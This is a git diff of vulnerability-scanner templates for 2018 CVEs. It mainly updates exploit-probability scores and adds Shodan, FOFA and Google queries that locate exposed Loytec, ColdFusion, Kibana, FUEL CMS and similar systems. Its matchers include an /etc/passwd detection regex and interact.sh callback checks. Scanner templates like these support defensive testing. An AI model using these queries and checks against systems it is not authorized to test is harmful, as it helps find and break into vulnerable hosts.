\ No newline at end of file +# digest: 4b0a00483046022100a91696514f764742eec98d1081aef7777203bdfdf7503565adb899edfe889f2a022100d1c9c522a49e9b678fb3d7c542ce0327118466d0d1f02da86043cb9b71db3345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index d18230ef1a..30e32db710 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -20,13 +20,13 @@ info: cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 - epss-score: 0.00685 - epss-percentile: 0.79617 - cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00644 + epss-percentile: 0.79217 + cpe: cpe:2.3:h:loytec:lgate-902:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: loytec - product: lgate-902_firmware + product: lgate-902 tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss http: @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022043b6d593685732c05b518667af8e2a87711364d9dba4b0f64504a93eae54f2d9022100c5bf2364a2dd3724e40859f816ee1840a3245ed1a33f2273abf587916684486e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201431da7cb7d0c6f1cc9fe645c0cb50a7fd2bd61e9bf77564ef03316199d1e4f6022100f8c96bfcbbe4073e99071df37061329f4acf9403c04049f844f8d7c713c2ab0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 882b57bf37..38fe0e7799 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -21,15 +21,18 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 - epss-score: 0.44897 - epss-percentile: 0.97077 + epss-score: 0.43288 + epss-percentile: 0.97355 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: loytec product: lgate-902_firmware - shodan-query: http.html:"LGATE-902" + shodan-query: + - http.html:"LGATE-902" + - http.html:"lgate-902" + fofa-query: body="lgate-902" tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss http: @@ -47,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008929837b5939b1ff8e23c3aa918320cecf9fd3b55b4537f678b6fb1cf7adbb78022100fcb09aa8d8b3d8dfad96f607140c838945e4cc52b521e7dfcc4f6d7fb80c5c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 0276a7408c..ebb1b7959d 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201be780a4469ea0a8738f8438126c71d69f8d31d05d6839b39986254edf0db41402207b1a3a25c0738e82ca020983b3a8445e0463f65171558f9d5011fdcafecd6853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f0f25f2551f0a387e62f98821d148b071d8feeb62c016ee0a73491fbef4b47c02210083dd29779ff7f5309807d128bb88de8a1a1aa9ca767c5b36f90a3313fc9bb651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 7769d3d9b3..9f301fb083 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -13,13 +13,14 @@ info: - https://cxsecurity.com/issue/WLB-2018080070 - https://www.exploit-db.com/exploits/45167/ - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 epss-score: 0.21114 - epss-percentile: 0.95976 + epss-percentile: 0.96408 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 @@ -44,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b0ed4bce15d30705879eea7dd0299bd568936f4c93490a2eb2cf6a120bbec9d022058e551bd65de05595c3d6a81d60313c7062d261e34d7c7466911ba50e8cb87f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200618e5366342cbf2d56d1d6d56e7cec9b447d2d32fd8567a1897a56ede11f2a70220217f8ffccedb2eecd94c33d1a88298514115cd9b8646d39090d7055fd5b56dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 0c8c87aa62..6e42b8366e 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01001 - epss-percentile: 0.83284 + epss-percentile: 0.83597 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e26f46ac8fa0fbf78f910c608f41335ab410d944ba39bd21b4a25bf3f366b2c70221008bcd07b274e596cc4f0004c5167e46e1e2955692de90e4d0356634f1390bb2b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 792ee61d48..1d233eb624 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 - http://seclists.org/fulldisclosure/2018/Aug/34 - https://www.exploit-db.com/exploits/45271/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - epss-score: 0.97149 - epss-percentile: 0.9976 + epss-score: 0.9704 + epss-percentile: 0.99756 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c4ddbcd4e1d9a14a467c108e82ff87b32ec9351cb237830dd61e9ade6527fd0022040b2a10a4d6e4ce8557f04d663b75210e2f1e9ff391b65f66608c885c794c323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc45ca6bc462dfa12f3816a1d91516eb665c5c4890cbdc399651e65cb9d55488022100bc6fa04ba3a8224f267355833878b5b57b1da1a0cc82659bf3019b7aa6bd7c80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 42be838d22..f2a35a1f74 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -21,13 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - epss-score: 0.94576 - epss-percentile: 0.99184 + epss-score: 0.92562 + epss-percentile: 0.98989 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: argussurveillance product: dvr + shodan-query: http.title:"web viewer for samsung dvr" + fofa-query: title="web viewer for samsung dvr" + google-query: intitle:"web viewer for samsung dvr" tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr http: @@ -47,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc9985c42c6ada43064e760b5d0e9e7c91e0c13be081b6667a4578d416a3f8ac022100b49638b1fa7561d27698d6962f89f45384b44df899a37f6e01d94674e4651cd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ca9821ca84e3035987df97624dd5b8883b8c4849fc29b8142652e4e7d0080610220312c12edb16e29c072a827155cdebc39f586b5d5c69b398cb846e2c7d93792da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 507df95ba1..9cd1eb56cc 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -18,15 +18,18 @@ info: cvss-score: 5.4 cve-id: CVE-2018-15917 cwe-id: CWE-79 - epss-score: 0.04217 - epss-percentile: 0.92046 + epss-score: 0.02648 + epss-percentile: 0.90369 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: jorani_project product: jorani - shodan-query: title:"Login - Jorani" + shodan-query: + - title:"Login - Jorani" + - http.favicon.hash:-2032163853 + fofa-query: icon_hash=-2032163853 tags: cve,cve2018,jorani,xss,jorani_project http: @@ -55,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205047dbc535649894bd8ccb683fd2f2cf11fb5c4fdfcd44b02baed63fb9d24bf102204397b93cbcb1f6730826f342f91cb719a6c621bd3d7fc939738abd541633ce6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 799a2e2293..6b857b13f0 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -20,14 +20,22 @@ info: cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 - epss-score: 0.97411 - epss-percentile: 0.99921 + epss-score: 0.97436 + epss-percentile: 0.99942 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive http: @@ -76,4 +84,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079a0f0e0bdc7376e1343de468e02f8dd25505916ea291f52a4b4672bb49f58c6022045414437bbe18a49102cd5f18a1434331c158de4796d2340acbe64d8b9f82767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a68bcb637356d729324efaa847af1c7072a2a575cffc0b1d77d36895e9533d6d0220452e48d827ac18ded3d44c0905f3f38a899724e774a3e7153107b2f60701c656:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index bcc16fdd8f..f1cbceaf0d 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -21,14 +21,18 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: bibliosoft product: bibliopac - shodan-query: title:"Bibliopac" + shodan-query: + - title:"Bibliopac" + - http.title:"bibliopac" + fofa-query: title="bibliopac" + google-query: intitle:"bibliopac" tags: cve,cve2018,xss,bibliopac,bibliosoft http: @@ -51,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023dde117662333438c84453a2b78d70f4e34e523adb4977cc91e3b4ca95770d902207d20b575a2e6fc9158e82d114ee21604b003642b35da9588cc82d365a92906c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 5880a66046..94f72485c7 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -29,6 +29,8 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress + shodan-query: http.html:"/wp-content/plugins/gift-voucher/" + fofa-query: body="/wp-content/plugins/gift-voucher/" tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: @@ -49,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039c62ea7189c856952f0a35cfb1c5bcc09fd83a4aae6a766e8357ce6c29625e202204b8b8f1561357042ae671f4d7d5166f074ce46d7d8586fb02316afdd260df3bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 29cd045b1a..72474e0253 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16167 cwe-id: CWE-78 epss-score: 0.27457 - epss-percentile: 0.9669 + epss-percentile: 0.96794 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http -# digest: 490a004630440220391e666a4ba5604bb62fcd1ca7396a502fb6f43913e9cd3c14529faf765f1464022047bf7f2d790f04727bd7e93e901f9af13a8077b286023e0a843688319ccf9df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100952a1352dd220013331b92a16c56b5dbbf5c5b182026eed1fe8c66a80f18c3f20221008371d2a7719b97ddcef29d12f4bbb58467f8d043fa3f24801eada79ea643b899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 375c7740ab..24a5cdb12b 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - epss-score: 0.0412 - epss-percentile: 0.91963 + epss-score: 0.25721 + epss-percentile: 0.96702 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -38,4 +38,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a004630440220566093a92cc8bec90dea2dd4f78b4c6393324f9ae1a6508694ae7ab1961555bd022016fd5d0fb9f8a0483755d3735220fde2bfc22fa1d4ab1e2934215495ccddd3e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f345418a161970b49efb6847c938b02cf85e55ab2728b7a999c99c1298947949022011733c212eabc394a4c104cef7a0ae31b2b2297505c4c2364ac73d2dad0c2411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index dcf16683bf..7ed174c5b3 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.12055 - epss-percentile: 0.95227 + epss-percentile: 0.95357 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c44f04d87cd0bb24833f17912104c4fe7f11064d15ad1ec47e91daedda230a402203c5b59f016c1ab24a2a0f0531c04b7fdab6907c1d028f7c976fef3bf42f929eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f25577d15cb32f1ccc5b8c48bd1cee8c81f2c55bf33b6c19e89312d5e7cedc150221008796a9740e57e6b50caf52841a8a4c9d52a17662d1d3ae7bea7549de24603e97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index d619183fcc..4c936e1fe4 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00189 - epss-percentile: 0.55432 + epss-percentile: 0.56242 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,4 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 4b0a004830460221008a613403e95cd869d597b3567f9774508802b578940d4923d3e724796ed4a51d022100e7705c676701af5b47545de5a166c31d2a905825dee9546405c3aa21ab76d712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f577e87fb7faacc4dc64dbe19fd42241785f865be0875b60af563a393ef813ad022028628bf09067fa419b7b5ed8ea0b2610fbfa7b643114361ad2a18bd2d593338b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 9ffd6e17c3..92f2cb104f 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - epss-score: 0.00543 - epss-percentile: 0.74952 + epss-score: 0.0045 + epss-percentile: 0.75058 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018fd3deeccb83eb769fde94c8460fb450d314b6cd1d5f09e5e6673e66c1f30d5022100e35701ec81596fff8cae290f6d481ccbebcaeb0da6573b1f149d30d8f945a163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b54f467183de3b3a31a23eff25fa6b7e31a40b596318042dd4a50afc2466987b02201e7898d41a785ccdb33f9ead77fbcab180c3bc0dca2a626981f431882fed4cb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 23f9df48fa..1e250bb291 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -14,18 +14,21 @@ info: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 - https://nvd.nist.gov/vuln/detail/CVE-2018-16761 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 + epss-score: 0.00069 + epss-percentile: 0.29966 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eventum_project product: eventum + shodan-query: http.favicon.hash:305412257 + fofa-query: icon_hash=305412257 tags: cve,cve2018,redirect,eventum,oss,eventum_project http: @@ -40,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204562ef9fe20f212abf05ec4054f5fb31ac2f4a14939814e81691480bad569df00221008627875be3d1ece4db50fe44826d8bcb8aa0b34273478d04591d11762f1a31eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index ce8c147b8c..659b6f5ad7 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 - epss-score: 0.83285 - epss-percentile: 0.98356 + epss-score: 0.79227 + epss-percentile: 0.98278 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thedaylightstudio product: fuel_cms + shodan-query: http.title:"fuel cms" + fofa-query: title="fuel cms" + google-query: intitle:"fuel cms" tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio http: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aa22ae2b5004894a2274f6ac1b4e153cdcd9a2081a3e84d0853a7612a808693f02202177babac08cedd1a18e2d633c4f2705131f42a6354c14302ec02ebddbfdaf1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204094d65babc7f0b5c8c10d59b17d51f9ce5a347b0e0a86a8b1f4d4b26623b06202204860bf57ffcc49976f3017bfba65e702e9b416919b8f7e5bd18ad345625f0285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index d98d6b1447..cccc297153 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.26631 - epss-percentile: 0.96643 + epss-percentile: 0.96743 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d269609e9e99d0bdcd79d0fcc8f5b9fbcf7c09469f92d28e20e23c0c03b931b7022054d56d332e1163cb08f2567a622b794aaa85cb5d57b3e78cce3aa57152c9b586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c2df0229ff7748acdd22d008c7f88c515a2b5fe7b93f0be7ff4faeaa59e37ca02210082b5dd9724a4b7d1b568fb6c433bcebd074fd44c03fc25152b56981c927cf3a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index d47482ca8a..2df7730492 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: monstra product: monstra + shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss http: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f0f643f0280b3aefe1f1955b44b15712d5ccbcbdf55470bf60ae139ad08b3870221008a61c94baf588d5590ba60988681f69ac91aa02ad71a098ac1c191a627a45c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 2a1cad77ca..e0dccd1114 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17153 cwe-id: CWE-287 - epss-score: 0.81607 - epss-percentile: 0.98273 + epss-score: 0.59445 + epss-percentile: 0.97757 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware shodan-query: http.favicon.hash:-1074357885 + fofa-query: icon_hash=-1074357885 tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital http: @@ -49,4 +50,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and -# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058db5a0e66e0185894958f6d96aecf72c3bcfed2c0a1d26f6add29d09ce286c802200fc8d42f35b7c7769ee299622a43e1f8505ee63afe91b259c4ea10fdaaaff74a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 6fdc4ec1a6..0247e45dfa 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: elastic product: kibana + shodan-query: http.title:"kibana" + fofa-query: title="kibana" + google-query: intitle:"kibana" tags: cve,cve2018,lfi,kibana,vulhub,elastic http: @@ -53,4 +56,4 @@ http: part: header words: - "application/json" -# digest: 4b0a0048304602210082c27b58a7f2461aff554dd5d689c6b64d365eb7a4307bb262df7556c0cfa5bd022100ccdcc3e07ad2d7fbb7a24bf16ad8d46efb371342f7048f1d74eba4b0db5eb126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220617b736bbf999b2273a36778922c989410f903fe4ffae35247d32cf4ee34ebb3022100c153e7a8dc7347707d23c5b67d8a30b1b569d1043c8aa5b1c7a09f288bd0ce50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index cca82bc302..93ef2179f2 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -11,13 +11,16 @@ info: reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ + - https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 - epss-score: 0.81793 - epss-percentile: 0.98093 + epss-score: 0.81623 + epss-percentile: 0.9836 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -40,4 +43,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 4a0a00473045022100b261fe2697190cd7fac57caae056784c0fcdafa77339c5b1b838502a79539d01022021a432a3def85765211df2c94058fa14b19323731d5e4f2f7735033eef2d39b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 